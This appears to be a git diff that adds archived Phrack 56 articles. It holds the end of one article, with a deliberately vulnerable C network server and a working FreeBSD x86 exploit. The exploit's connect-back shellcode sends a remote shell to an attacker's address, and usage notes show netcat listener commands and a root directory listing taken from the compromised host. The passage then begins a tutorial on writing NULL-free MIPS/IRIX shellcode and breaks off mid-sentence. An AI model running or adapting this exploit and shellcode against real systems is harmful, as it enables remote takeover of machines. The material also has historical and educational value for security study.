+available at www.vicar.org/~twitch/projects/llehs.
+
+
+----|  The code
+
+<++> p56/Boobies/vuln.c !66dd8731
+/*
+ * vuln.c
+ * 
+ * 01/09/1999
+ * <twitch@vicar.org>
+ *
+ * Example to display how non-terminated strings in adjacent memory
+ * spaces may be exploited.
+ *
+ * Give it a port to listen on if you wish as argv[argc - 1]
+ * (the default is 6543). 
+ *
+ * The code is sloppy because I really didn't care. 
+ * Pretend it's a game on a Happy Meal(tm) box- how many other exploitable
+ * conditions can you find?
+ *
+ * to compile-
+ * [twitch@lupus]$ gcc -Wall -o vuln vuln.c
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+
+#ifndef MAXHOSTNAMELEN
+#define MAXHOSTNAMELEN   256
+#endif /* MAXHOSTNAME */
+
+#define PORT   6543
+
+int be_vulnerable(int);
+void oopsy(char *);
+int do_stuff(char *, int, u_short);
+
+int
+main(int argc, char **argv)
+{
+   char myname[MAXHOSTNAMELEN + 1];
+   struct hostent *h;
+   int r;
+   u_short port;
+
+   port = PORT;
+
+   if(argc > 1)
+      port = strtoul(argv[argc - 1], NULL, 10);
+
+   memset(myname, 0, MAXHOSTNAMELEN + 1);
+   r = gethostname(myname, MAXHOSTNAMELEN);
+   if(r){
+      perror("gethostname");
+      return(1);
+   }
+
+   if(!(strlen(myname))){
+      fprintf(stderr, "I have no idea what my name is, bailing\n");
+      return(1);
+   }
+   
+   h = gethostbyname(myname);
+   if(!h){
+      fprintf(stderr, "I couldn't resolve my own name, bailing\n");
+      return(1);
+   }
+
+   return(do_stuff(h->h_addr, h->h_length, port));
+}
+
+/*
+ * do_stuff()
+ *    Listen on a socket and when we get a connection, had it
+ *    off to be_vulnerable().
+ */
+int
+do_stuff(char *myaddr, int addrlen, u_short port)
+{
+   struct sockaddr_in sin, fin;
+   int s, r, alen;
+   char *p;
+   memcpy(&sin.sin_addr.s_addr, myaddr, addrlen); 
+   
+   p = inet_ntoa(sin.sin_addr);
+
+   if(sin.sin_addr.s_addr == -1L){
+      fprintf(stderr, "inet_addr returned the broadcast, bailing\n");
+      return(1);
+   }
+
+   memset(&sin, 0, sizeof(struct sockaddr));
+   sin.sin_family = AF_INET;
+   sin.sin_port = htons(port);
+
+   s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
+   if(s < 0){
+      perror("socket");
+      return(1);
+   }
+
+   alen = sizeof(struct sockaddr);
+   r = bind(s, (struct sockaddr *)&sin, alen);
+   if(r < 0){
+      perror("bind");
+      return(1);
+   }
+
+   r = listen(s, 1);
+   if(r < 0){
+      perror("listen");
+      return(1);
+   }
+
+   printf("Accepting connections on port %d...\n", port);
+
+   memset(&fin, 0, alen);
+   r = accept(s, (struct sockaddr *)&fin, &alen);
+   if(r < 0){
+      perror("accept");
+      return(1);
+   }
+
+   return(be_vulnerable(r));
+}
+
+/*
+ * be_vulnerable()
+ *    We grab a chunk o' data from the wire and deal with it
+ *    in an irresponsible manner.
+ */
+int
+be_vulnerable(int s)
+{
+   int r;
+   char buf[1024], buf2[256];
+
+   memset(buf, 0, 1024);
+   memset(buf2, 0, 256);
+   r = read(s, (void *)buf, 1024);
+   r = read(s, (void *)buf2, 256);
+
+   oopsy(buf2);
+
+   close(s);
+   return(0);
+}
+
+/*
+ * oopsy()
+ *    Copy data into local storage to do something with it.
+ *    I'm lazy so all this does is cause the overflow.
+ */
+void
+oopsy(char *p)
+{
+   char mybuf[256];
+
+   fprintf(stderr, "Oh shit, p is %d bytes long.\n", strlen(p));
+   strncpy(mybuf, p, strlen(p));
+}
+<-->
+<++> p56/Boobies/boobies.c !f264004c
+/*
+ * boobies.c
+ *
+ * 01/09/1999
+ * <twitch@vicar.org>
+ *
+ * Dedicated to Kool Keith, Bushmill's smooth and mellow (distilled
+ * three times) Irish Whiskey, and that one SCO guy's beautiful lady.
+ *
+ *
+ * Example exploit for vuln.c to display how non-terminated strings
+ * in adjacent memory can cause real troubles.
+ *
+ * This shellcode will establish a TCP connection to any port and
+ * address you deem fit (see the shellcode for where/how to do this)
+ * and drop a shell. You won't get a prompt, but otherwise, it is a
+ * full shell with the privleges of whatever the exploited program had.
+ *
+ * This is the x86 FreeBSD version- Linux and SPARC Solaris versions,
+ * as well as full assembly listings are available at
+ * www.vicar.org/~twitch/projects/llehs
+ *
+ * To use this exploit, run the silly little vulnerability demo
+ * program on some system (in this example it's running on a system
+ * called lupus) thusly:
+ *
+ * [twitch@lupus]$ ./vuln
+ * Accepting connections on port 6543...
+ *
+ * Then do this on the attacking system (or wherever you are directing
+ * the shell):
+ *
+ * [twitch@pornstar]$ nc -n -v -l -p 1234
+ * listening on [any] 1234 ...
+ *
+ *    [ from another terminal/window ]
+ *
+ * [twitch@pornstar]$ ./boobies -a 192.168.1.1 -p 1234 |nc -v lupus 6543
+ * lupus [192.168.1.6] 6543 (?) open
+ *
+ *    [ back to the first terminal/window ]
+ *
+ * connect to [192.168.1.1] from (lupus) [192.168.1.6] 1234
+ * uname -n
+ * lupus.vicar.org
+ * ls -alF /root/
+ * total 14
+ * drwxr-x---   3 root  wheel   512 Dec  8 20:44 ./
+ * drwxr-xr-x  19 root  wheel   512 Dec 10 19:13 ../
+ * -rw-------   1 root  wheel  4830 Jan  4 16:15 .bash_history
+ * -rw-------   2 root  wheel   383 May 17  1999 .cshrc
+ * -rw-------   1 root  wheel  1354 Jan  5 10:33 .history
+ * -rw-------   1 root  wheel   124 May 17  1999 .klogin
+ * -rw-------   1 root  wheel   491 Dec  4 19:59 .login
+ * -rw-------   2 root  wheel   235 May 17  1999 .profile
+ * drwxr-x---   2 root  wheel   512 Dec  8 20:44 .ssh/
+ * ^C
+ * [twitch@pornstar]$
+ *
+ * You will need to supply an offset of around -50 if
+ * vuln is running on a port besides the default.
+ *
+ * The exploit has a few options that you can read about by doing:
+ * [twitch@pornstar]$ ./boobies -h
+ * usage: ./boobies [-o offset_nudge] [-p port] [-a address] [-A alignment]
+ *    -o              Nudge the offset offset_nudge bytes.
+ *    -p              Port to which the target should connect.
+ *    -a              Address to which the target should connect.
+ *                    (Must be an IP address because I'm lazy.)
+ *    -A              Nudge the alignment.
+ *    -v              Be verbose about what we're doing.
+ *    -h              The secret to life.
+ *
+ * If you compile this on non-x86 architectures, you will prolly have to
+ * play with the alignment a bit.
+ *
+ * to compile-
+ * [twitch@pornstar]$ gcc -o boobies -Wall boobies.c
+ * Be alert, look alive, and act like you know.
+ */
+
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+char llehs[] =
+   "\x55\x89\xe5\xeb\x7e\x5e\x31\xc0\x88\x46\x07\x83\xec\x18"  /* 14 */
+   "\xc6\x45\xe9\x02\x31\xc0\x66\xb8"                          /* 22 */
+
+   /*
+    * Replace with (htons(port) ^ 0xff).
+    * Defaults to 1234.
+    */
+   "\xfb\x2d"
+
+   "\x66\x35\xff\xff\x66\x89\x45\xea\xb8"                      /* 33 */
+
+   /*
+    * Replace with (inet_addr(host_to_conenct_to) ^ 0xffffffff).
+    * Defaults to 192.168.1.6.
+    */
+   "\x3f\x57\xfe\xf9"
+
+   "\x83\xf0\xff\x89\x45\xec\x6a\x06\x6a\x01\x6a\x02\x6a\x0f\x31\xc0\xb0"
+   "\x61\xcd\x80"
+
+   "\x6a\x10\x89\xc3\x8d\x45\xe8\x50\x53\x6a\x0f\x31\xc0\xb0\x62\xcd\x80"
+   "\x31\xc0\x50\x53\x6a\x0f\xb0\x5a\xcd\x80"
+   "\x53\x6a\x0f\x31\xc0\xb0\x06\xcd\x80"
+   "\x6a\x01\x31\xc0\x50\x6a\x0f\xb0\x5a\xcd\x80"
+   "\x6a\x02\x31\xc0\x50\x6a\x0f\xb0\x5a\xcd\x80"
+   "\x31\xc0\x50\x50\x56\x6a\x0f\xb0\x3b\xcd\x80"
+   "\x31\xc0\x40\xcd\x80"
+   "\xe8\x7d\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+/*
+ * This offset seems to work if you are running the exploit and the
+ * vulnerable proggy on the same machine, with vuln listening on its
+ * default port. If vuln is listening on a user-supplied port, this
+ * needs to be around 0xbfbfd0fc.  YMMV.
+ */
+#define OFFSET    0xbfbfd108
+#define NOP       0x90
+#define BUFSIZE   1300
+#define SHELLSIZE 143
+#define PAD       32
+#define ALIGNIT   0
+
+/*
+ * Offset into the shellcode for the port
+ */
+#define SCPORTOFF 22
+
+/*
+ * Offset into the shellcode for the address
+ */
+#define SCADDROFF 33
+
+void
+usage(char *proggy)
+{
+   fprintf(stderr, "usage: %s [-o offset_nudge] [-p port] [-a address] ",
+         proggy);
+   fprintf(stderr, "[-A alignment]\n");
+   fprintf(stderr, "\t-o\t\tNudge the offset offset_nudge bytes.\n");
+   fprintf(stderr, "\t-p\t\tPort to which the target should connect.\n");
+   fprintf(stderr, "\t-a\t\tAddress to which the target should connect.\n");
+   fprintf(stderr, "\t\t\t(Must be an IP address because I'm lazy.)\n");
+   fprintf(stderr, "\t-A\t\tNudge the alignment.\n");
+   fprintf(stderr, "\t-v\t\tBe verbose about what we're doing.\n");
+   fprintf(stderr, "\t-h\t\tThe secret to life.\n");
+   fprintf(stderr, "\n");
+
+   exit(1);
+}
+
+void
+main(int argc, char **argv)
+{
+   char b00m[BUFSIZE], *p, c;
+   char *port, *addr;
+   u_short portd;
+   u_long addrd;
+   extern char *optarg;
+   int i, nudge = 0, o = OFFSET, align = 0;
+   int verb = 0;
+
+   port = &(llehs[SCPORTOFF]);
+   addr = &(llehs[SCADDROFF]);
+   while((c = getopt(argc, argv, "o:p:a:A:vh")) != -1){
+      switch(c){
+         /*
+          * Nudge to the offset
+          */
+         case 'o':
+            nudge = strtoul(optarg, NULL, 10);
+            break;
+         /*
+          * Port to which we connect
+          */
+         case 'p':
+            portd = strtoul(optarg, NULL, 10);
+
+            if(verb)
+               fprintf(stderr, "Shell coming back on port %d\n", portd);
+
+            portd = htons(portd);
+            portd ^= 0xffff;
+
+            if(verb)
+               fprintf(stderr, " (0x%x)\n", portd);
+
+            memcpy((void *)port, (void *)&portd, sizeof(u_short));
+            break;
+         /*
+          * Address to which we connect
+          */
+         case 'a':
+            addrd = inet_addr(optarg);
+            if(addrd == -1L){
+               fprintf(stderr, "Bad address '%s'.\n", optarg);
+               exit(1);
+            }
+            addrd ^= 0xffffffff;
+            memcpy((void *)addr, (void *)&addrd, sizeof(u_long));
+
+            if(verb){
+               fprintf(stderr, "Shell is being sent to %s.\n", optarg);
+               fprintf(stderr, " (0x%lx)\n", addrd);
+            }
+
+            break;
+         /*
+          * Alignment (should only be necessary on architectures
+          * other than x86)
+          */
+         case 'A':
+            align = strtoul(optarg, NULL, 10);
+            break;
+         case 'v':
+            verb++;
+            break;
+         case 'h':
+         default:
+            usage(argv[0]);
+            break;
+         }
+   }
+
+   o += nudge;
+   align += ALIGNIT;
+
+   if(verb){
+      fprintf(stderr, "Offset is 0x%x\n", o);
+      fprintf(stderr, "Alignment nudged %d bytes\n", align);
+   }
+
+   p = b00m;
+   memset(p, 0x90, sizeof(b00m)); 
+   p = b00m + ALIGNIT;
+   for(i = 0; i < PAD; (i += 4)){
+      *((int *)p) = o;
+      p +=4;
+   }
+
+   p = (&b00m[0]) + PAD + PAD + ALIGNIT;
+   memcpy((void *)p, (void*)llehs, SHELLSIZE);
+
+   b00m[BUFSIZE] = 0;
+   fprintf(stderr, "payload is %d bytes wide\n", strlen(b00m));
+   printf("%s", b00m);
+   exit(0);
+}
+<-->
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/15.txt b/phrack56/15.txt
new file mode 100644
index 0000000..c0a05e5
--- /dev/null
+++ b/phrack56/15.txt
@@ -0,0 +1,753 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x0f[0x10]
+
+|------------------------ WRITING MIPS/IRIX SHELLCODE ------------------------|
+|-----------------------------------------------------------------------------|
+|--------------------------------- scut/teso ---------------------------------|
+
+
+----|  Intro
+
+Writing shellcode for the MIPS/Irix platform is not much different from writing
+shellcode for the x86 architecture.  There are, however, a few tricks worth
+knowing when attempting to write clean shellcode (which does not have any NULL
+bytes and works completely independent from it's position).
+
+This small paper will provide you with a crash course on writing IRIX
+shellcode for use in exploits.  It covers the basic stuff you need to know to
+start writing basic IRIX shellcode.  It is divided into the following sections:
+
+    - The IRIX operating system
+    - MIPS architecture
+    - MIPS instructions
+    - MIPS registers
+    - The MIPS assembly language
+    - High level language function representation
+    - Syscalls and Exceptions
+    - IRIX syscalls
+    - Common constructs
+    - Tuning the shellcode
+    - Example shellcode
+    - References
+
+
+----|  The IRIX operating system
+
+The Irix operating system was developed independently by Silicon Graphics and
+is UNIX System V.4 compliant. It has been designed for the MIPS CPU's, which
+have a unique history and have pioneered 64-bit and RISC technology.  The
+current Irix version is 6.5.7.  There are two major versions, called feature
+(6.5.7f) and maintenance (6.5.7m) release, from which the feature release is
+focused on new features and technologies and the maintenance release on bug
+fixes and stability.  All modern Irix platforms are binary compatible and this
+shellcode discussion and the example shellcodes have been tested on over half a
+dozen different Irix computer systems.
+
+
+----|  MIPS architecture
+
+First of all you have to have some basic knowledge about the MIPS CPU
+architecture.  There are a lot of different types of the MIPS CPU, the most
+common are the R4x00 and R10000 series (which share the same instruction set).
+
+A MIPS CPU is a typical RISC-based CPU, meaning it has a reduced instruction
+set with less instructions then a CISC CPU, such as the x86.  The core concept
+of a RISC CPU is a tradeoff between simplicity and concurrency:  There are
+less instructions, but the existing ones can be executed quickly and in
+parallel.  Because of this small number of instructions there is less
+redundancy per instruction, and some things can only be done using a single
+instruction, while on a CISC CPU this can only be achieved by using a variety
+of different instructions, each one doing basically the same thing.  As a
+result of this, MIPS machine code is larger then CISC machine code, since
+often multiple instructions are required to accomplish the same operation that
+CISC CPU's are able to do with one single instruction.
+
+Multiple instructions do not, however, result in slower code.  This is a
+matter of overall execution speed, which is extremely high because of the
+parallel execution of the instructions.
+
+On a MIPS CPU the concurrency is very advanced, and the CPU has a pipeline with
+five slots, which means five instructions are processed at the same time and
+every instruction has five stages, from the initial IF pipestage (instruction
+fetch) to the last, the WB pipestage (write back).
+
+Because the instructions overlap within the pipeline, there are some
+"anomalies" that have to be considered when writing MIPS machine code:
+
+    - there is a branch delay slot: the instruction following the branch
+      instruction is still in the pipeline and is executed after the jump has
+      taken place
+    - the return address for subroutines ($ra) and syscalls (C0_EPC) points
+      not to the instruction after the branch/jump/syscall instruction but to
+      the instruction after the branch delay slot instruction
+    - since every instruction is divided into five pipestages the MIPS design
+      has reflected this on the instructions itself: every instruction is
+      32 bits broad (4 bytes), and can be divided most of the times into
+      segments which correspond with each pipestage
+
+
+----|  MIPS instructions
+
+MIPS instructions are not just 32 bit long each, they often share a similar
+mapping too.  An instruction can be divided into the following sections:
+
+      + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+       31302928272625242322212019181716151413121110 9 8 7 6 5 4 3 2 1 0
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      | op        | sub-op  |xxxxxxxxxxxxxxxxxxxxxxxxxxxxx| subcode   |
+      +-----------+---------+-----------------------------+-----------+
+
+The "op" field denotes the six bit primary opcode.  Some instructions, such
+as long jumps (see below) have a unique code here, the rest are grouped by
+function.  The "sub-op" section, which is five bytes long can represent either
+a specific sub opcode as extension to the primary opcode or can be a register
+block.  A register block is always five bits long and selects one of the CPU
+registers for an operation. The subcode is the opcode for the arithmetic and
+logical instructions, which have a primary opcode of zero.
+
+The logical and arithmetic instructions share a RISC-unique attribute: They
+do not work with two registers, such as common x86 instructions, but they use
+three registers, named "destination", "target" and "source".  This allows more
+flexible code, if you still want CISC-like instructions, such as
+"add %eax, %ecx", just use the same destination and target register for the
+operation.
+
+A typical MIPS instruction looks like:
+
+    or   a0, a1, t4
+
+which is easy to represent in C as "a0 = a1 | t4".  The order is almost always
+equivalent to a simple C expression.
+
+Some simple instructions are listed below.
+
+- dest, source, target, and register are registers (see section on MIPS
+  registers below).
+- value is a 16 bit value, either signed or not, depending on the instruction.
+- offset is a 16 bit relative offset. loffset is a 26 bit offset, which is
+  shifted so that it lies on a four byte boundary.
+
+  or      dest, source, target     logical or: dest = source | target
+  nor     dest, source, target     logical not or: d = ~ (source | target)
+  add     dest, source, target     add: dest = source + target
+  addu    dest, source, value      add immediate signed: dest = source + value
+  and     dest, source, target     logical and: dest = source & target
+  beq     source, target, offset   if (source == target) goto offset
+  bgez    source, offset           if (source >= 0) goto offset
+  bgezal  source, offset           if (source >= 0) offset ()
+  bgtz    source, offset           if (source > 0) goto offset
+  bltz    source, offset           if (source < 0) goto offset
+  bltzal  source, offset           if (source < 0) offset ()
+  bne     source, target, offset   if (source != target) goto offset
+  j       loffset                  goto loffset (within 2^28 byte range)
+  jr      register                 jump to address in register
+  jal     loffset                  loffset (), store retaddr in $ra
+  li      dest, value              load imm.: expanded to either ori or addiu
+  lw      dest, offset             dest = *((int *) (offset))
+  slt     dest, source, target     signed: dest = (source < target) ? 1 : 0
+  slti    dest, source, value      signed: dest = (source < value) ? 1 : 0
+  sltiu   dest, source, value      unsigned: dest = (source < value) ? 1 : 0
+  sub     dest, source, target     dest = source - target
+  sw      source, offset           *((int *) offset) = source
+  syscall                          raise syscall exception
+  xor     dest, source, target     dest = source ^ target
+  xori    dest, source, value      dest = source ^ value
+
+This is obviously not complete.  However, it does cover the most important
+instructions for writing shellcode.  Most of the instructions in the example
+shellcodes can be found here.  For the complete list of instructions see
+either [1] or [2].
+
+
+----|  MIPS registers
+
+The MIPS CPU has plenty of registers. Since we already know registers are
+addressed using a five bit block, there must be 32 registers, $0 to $31. They
+are all alike except for $0 and $31.  For $0 the case is very simple: No
+matter what you do to the register, it always contains zero.  This is
+practical for a lot of arithmetic instructions and can results in elegant code
+design.  The $0 register has been assigned the symbolic name $zero.  The $31
+register is also called $ra, for "return address".  Why should a register ever
+contain a return address if there is such a nice stack to store it?  And how
+should recursion be handled otherwise? Well, the short answer is, there is no
+real stack and yes it works.  For the longer answer we will shortly discuss
+what happens when a function is called on a RISC CPU.  When this is done a
+special instruction called "jal" is used.  This instruction overwrites the
+content of the $ra ($31) register with the appropriate return address and then
+jumps to an arbitrary address.  The called function does however see the
+return address in $ra and once finished just jumps back (using the "jr"
+instruction) to the return address.  But what if the function wants to call
+functions, too? Then there is a stack-like segment the function can store the
+return address on, later restore it and then continue to work as usual.
+
+Why "stack-like"?  Because there is only a stack by convention, and any
+register may be used to behave like a stack.  There are no push or pop
+instructions however, and the register has to be adjusted manually.  The
+"stack" register is $29, symbolically referred as $sp.  The stack grows to the
+smaller addresses, just like on the x86 architecture.
+
+There other register conventions, nearly as many as there are registers.  For
+the sake of completeness here is a small listing:
+
+  number  symbolic  function
+ -------  --------- -----------------------------------------------------------
+      $0  $zero     always contains zero
+      $1  $at       is used by assembler (see below), do not use it
+   $2-$3  $v0, $v1  subroutine return values
+   $4-$7  $a0-$a3   subroutine arguments
+  $8-$15  $t0-$t7   temporary registers, may be overwritten by subroutine
+ $16-$23  $s0-$s7   subroutine registers, have to be saved by called function
+                    before they may be used
+ $24,$25  $t8, $t9  temporary registers, may be overwritten by subroutine
+ $26,$27  $k0, $k1  interrupt/trap handler reserved registers, do not use
+     $28  $gp       global pointer, used to access static and extern variables
+     $29  $sp       stack pointer
+     $30  $s8/$fp   subroutine register, commonly used as a frame pointer
+     $31  $ra       return address
+
+There are also 32 floating point registers, each 32 bits long (64 bits on
+newer MIPS CPUs). They are not important for system programming, so we will not
+discuss them here.
+
+
+----|  The MIPS assembly language
+
+Because the instructions are relatively primitive and programmers often want
+to accomplish more complex things, the MIPS assembly language works with a lot
+of macro instructions.  They sometimes provide really necessary operations,
+such as subtracting a number from a register (which is converted to a signed
+add by the assembler) to complex macros, such as finding the remainder for a
+division.  But the assembler does a lot more than providing macros for common
+operations.  We already mentioned the pipeline in which instructions are
+processed simultaneously.  Often the execution directly depends on the order
+within the pipeline, because the registers accessed with the instructions are
+written back in the last pipestage, the WB (write-back) stage and cannot be
+accessed before by other instructions.  For old MIPS CPUs the MIPS
+abbreviation is true when saying "Microcomputer without Interlocked Pipeline
+Stages", you just cannot access the register in the instruction directly
+following the one that modifies this register.  Nearly all MIPS CPUs
+currently in service do have an interlock though, they just wait until the
+data from the instruction is written back to the register before allowing the
+following instruction to read it.  In practice you only have to worry when
+writing very low level assembly code, such as shellcode :-), because most of
+the times the assembler will reorder and replace your instructions so that
+they exploit the pipelined architecture at best.  You can turnoff this
+reordering and macros in any MIPS assembler, if you want to.
+
+The MIPS CPUs and RISC CPUs altogether were not designed with easy assembly
+language programming in mind.  It is more difficult, however, to program a
+RISC CPU in assembly than any CISC CPU.  Even the first sentences of the MIPS
+Pro Assembler Manual from the MIPS corporation recommend to use MIPS assembly
+language only for hardware near routines or operating system programming.  In
+most cases a good C compiler, such as the one MIPS developed will optimize the
+pipeline and register usage way better then any programmer might do in
+assembly.  However, when writing shellcodes we have to face the bare machine
+code and have to write size-optimized code, which does not contain any NULL
+bytes.  A compiler might use large code to unroll loops or to use faster
+constructs, we can not.
+
+
+----|  High level language function representation
+
+Most of the time, a normal C function can be represented very easily in MIPS
+assembly.  You just have to differentiate between leaf and non-leaf functions.
+A non-leaf function is a function that does not call any other function.  Such
+functions do not need to store the return address on the stack, but keep it in
+$ra for the whole time.  The arguments to a function are stored by the calling
+function in $a0, $a1, $a2 and $a3.  If this space is not sufficient enough
+extra stack space is used, but in most cases the registers suffice.  The
+function may return two 32bit values through the $v0 and $v1 registers.  For
+temporary space the called function may use the stack referred to by $sp.  Also
+registers are commonly saved on the stack and later restored from it.  The
+temporary registers ($t0-$t9) may be overwritten in the called function
+without restoring them later, if the calling functions wants to preserve them,
+it has to save them itself.
+
+The stack usually starts at 0x80000000 and grows towards small addresses.  As
+was already said, it is very similar to the stack of an x86 system.  
+
+
+----|  Syscalls and Exceptions
+
+On a typical Unix system there are only two modes that current execution can
+happen in: user mode and kernel mode.  In most modern architectures this
+modes are directly supported by the CPU.  The MIPS CPU has these two modes plus
+an extra mode called "supervisor mode".  It was requested by engineers at DEC
+for their new range of workstations when the MIPS R4000 CPU was designed.
+Since the VMS/DEC market was important to MIPS, they implemented this third
+mode at DEC's request to allow the VMS operating system to be run on the CPU.
+However, DEC decided later to develop their own CPU, the Alpha CPU and the
+mode remained unused.
+
+Back to the execution modes...  on current operating systems designed for the
+MIPS CPU only kernel mode and user mode are used.  To switch from user mode to
+the kernel mode there is a mechanism called "exceptions".  Whenever a user space process wants to let the kernel to do something or whenever the
+current execution can't be successfully continued the control is passed to the
+kernel space exception handler.
+
+For shellcode construction we have to know that we can make the kernel execute
+important operating system related stuff like I/O operations through the
+syscall exception, which is triggered through the "syscall" instruction.  The
+syscall instruction looks like:
+
+  syscall    0000.00xx xxxx.xxxx xxxx.xxxx xx00.1100
+
+Where the x's represent the 20 bit broad syscall code, which is ignored on the
+Irix system.  To avoid NULL bytes in your shellcode you can set those x-bits to
+arbitrary data.
+
+
+----|  IRIX syscalls
+
+The following list covers the most important syscalls for use in shellcodes.
+After all registers have been appropriately set the "syscall" instruction is
+executed and the execution flow is passed to the kernel.
+
+    accept
+    ------
+    int accept (int s, struct sockaddr *addr, socklen_t *addrlen);
+
+    a0 = (int) s
+    a1 = (struct sockaddr *) addr
+    a2 = (socklen_t *) addrlen
+    v0 = SYS_accept = 1089 = 0x0441
+
+    return values
+ 
+    a3 = 0 success, a3 != 0 on failure
+    v0 = new socket
+
+
+    bind
+    ----
+    int bind (int sockfd, struct sockaddr *my_addr, socklen_t addrlen);
+
+    a0 = (int) sockfd
+    a1 = (struct sockaddr *) my_addr
+    a2 = (socklen_t) addrlen
+    v0 = SYS_bind = 1090 = 0x0442
+
+    For the IN protocol family (TCP/IP) the sockaddr pointer points to a
+    sockaddr_in struct which is 16 bytes long and typically looks like:
+    "\x00\x02\xaa\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
+    where aa is ((port >> 8) & 0xff) and bb is (port & 0xff).
+
+    return values
+
+    a3 = 0 success, a3 != 0 on failure
+    v0 = 0 success, v0 != 0 on failure
+
+
+    close
+    -----
+    int close (int fd);
+
+    a0 = (int) fd
+    v0 = SYS_close = 1006 = 0x03ee
+
+    return values
+
+    a3 = 0 success, a3 != 0 on failure
+    v0 = 0 success, v0 != 0 on failure
+
+    execve
+    ------
+    int execve (const char *filename, char *const argv [], char *const envp[]);
+
+    a0 = (const char *) filename
+    a1 = (chat * const) argv[]
+    a2 = (char * const) envp[]
+    v0 = SYS_execve = 1059 = 0x0423
+
+    return values
+
+    should not return but replace current process with program, it only returns
+    in case of errors
+
+
+    fcntl
+    -----
+    int fcntl (int fd, int cmd);
+    int fcntl (int fd, int cmd, long arg);
+
+    a0 = (int) fd
+    a1 = (int) cmd
+    a2 = (long) arg   in case the command requires an argument
+    v0 = SYS_fcntl = 1062 = 0x0426
+
+    return values
+
+    a3 = 0 on success, a3 != 0 on failure
+    v0 is the real return value and depends on the operation, see fcntl(2) for
+    further information
+
+
+    fork
+    ----
+    int fork (void);
+
+    v0 = SYS_fork = 1002 = 0x03ea
+
+    return values
+
+    a3 = 0 on success, a3 != 0 on failure
+    v0 = 0 in child process, PID of child process in parent process
+
+
+    listen
+    ------
+    int listen (int s, int backlog);
+
+    a0 = (int) s
+    a1 = (int) backlog
+    v0 = SYS_listen = 1096 = 0x0448
+
+    return values
+
+    a3 = 0 on success, a3 != 0 on failure
+
+
+    read
+    ----
+    ssize_t read (int fd, void *buf, size_t count);
+ 
+    a0 = (int) fd
+    a1 = (void *) buf
+    a2 = (size_t) count
+    v0 = SYS_read = 1003 = 0x03eb
+
+    return values
+
+    a3 = 0 on success, a3 != 0 on failure
+    v0 = number of bytes read
+
+
+    socket
+    ------
+    int socket (int domain, int type, int protocol);
+
+    a0 = (int) domain
+    a1 = (int) type
+    a2 = (int) protocol
+    v0 = SYS_socket = 1107 = 0x0453
+
+    return values
+
+    a3 = 0 on success, a3 != 0 on failure
+    v0 = new socket
+
+
+    write
+    -----
+    int write (int fileno, void *buffer, int length);
+
+    a0 = (int) fileno
+    a1 = (void *) buffer
+    a2 = (int) length
+    v0 = SYS_write = 1004 = 0x03ec
+
+    return values
+
+    a3 = 0 on success, a3 != 0 on failure
+    v0 = number of bytes written
+
+
+    The dup2 functionality is not implemented as system call but as libc
+    wrapper for close and fcntl.  Basically the dup2 function looks like
+    (simplified):
+
+    int dup2 (int des1, int des2)
+    {
+        int tmp_errno, maxopen;
+
+        maxopen = (int) ulimit (4, 0);
+        if (maxopen < 0)
+        {
+            maxopen = OPEN_MAX;
+        }
+        if (fcntl (des1, F_GETFL, 0) == -1)
+        {
+            _setoserror (EBADF);
+            return -1;
+        }
+
+        if (des2 >= maxopen || des2 < 0)
+        {
+            _setoserror (EBADF);
+            return -1;
+        }
+
+        if (des1 == des2)
+        {
+            return des2;
+        }
+	tmp_errno = _oserror();
+        close (des2);
+        _setoserror (tmp_errno);
+
+        return (fcntl (des1, F_DUPFD, des2));
+    }
+
+    So without the validation dup2 (des1, des2) can be rewritten as:
+
+	close (des2);
+	fcntl (des1, F_DUPFD, des2);
+
+Which has been done in the portshell shellcode below.
+
+
+----|  Common constructs
+
+When writing shellcode there are always common operations, like getting the
+current address.  Here are a few techniques that you can use in your
+shellcode:
+
+- Getting the current address
+
+        li      t8, -0x7350     /* load t8 with -0x7350 (leet) */
+foo:	bltzal  t8, foo         /* branch with $ra stored if t8 < 0 */
+        slti    t8, zero, -1    /* t8 = 0 (see below) */
+bar:
+
+Because the slti instruction is in the branch delay slot when the bltzal is
+executed the next time the bltzal will not branch and t8 will remain zero.  $ra
+holds the address of the bar label when the same label is reached.
+
+- Loading small integer values
+
+Because every instruction is 32 bits long you cannot immediately load a 32 bit
+value into a register but you have to use two instructions.  Most of the time,
+however, you just want to load small values, below 256.  Values below 2^16 are
+stored as a 16 bit value within the instruction and values below 256 will
+result in ugly NULL bytes, that should be avoided in proper shellcode.
+Therefore we use a trick to load such small values:
+
+loading zero into reg (reg = 0):
+        slti    reg, zero, -1
+
+loading one into reg (reg = 1):
+        slti    reg, zero, 0x0101
+
+loading small integer values into reg (reg = value):
+        li      t8, -valmod     /* valmod = value + 1 */
+        not     reg, t8
+
+For example if we want to load 4 into reg we would use:
+        li      t8, -5
+        not     reg, t8
+
+In case you need small values more than one time you can also store them into
+saved registers ($s0 - $s7, optionally $s8).
+
+- Moving registers
+
+In normal MIPS assembly you would use the simple move instruction, which
+results in an "or" instruction, but in shellcode you have to avoid NUL bytes,
+and you can use this construction, if you know that the value in the register
+is below 0xffff (65535):
+	andi	reg, source, 0xffff
+
+
+----|  Tuning the shellcode
+
+I recommend that you write your shellcodes in normal MIPS assembly and
+afterwards start removing the NULL bytes from top to bottom.  For simple load
+instructions you can use the constructs above.  For essential instructions try
+to play with the different registers, in some cases NULL bytes may be removed
+from arithmetic and logic instructions by using higher registers, such as $t8
+or $s7.  Next try replacing the single instruction with two or three
+accomplishing the same.  Make use of the return values of syscalls or known
+register contents.  Be creative, use a MIPS instruction reference from [1] or
+[2] and your brain and you will always find a good replacement.
+
+Once you made your shellcode NULL free you will notice the size has increased
+and your shellcode is quite bloated.  Do not worry, this is normal, there is
+almost nothing you can do about it, RISC code is nearly always larger then the
+same code on x86.  But you can do some small optimizations to decrease it's
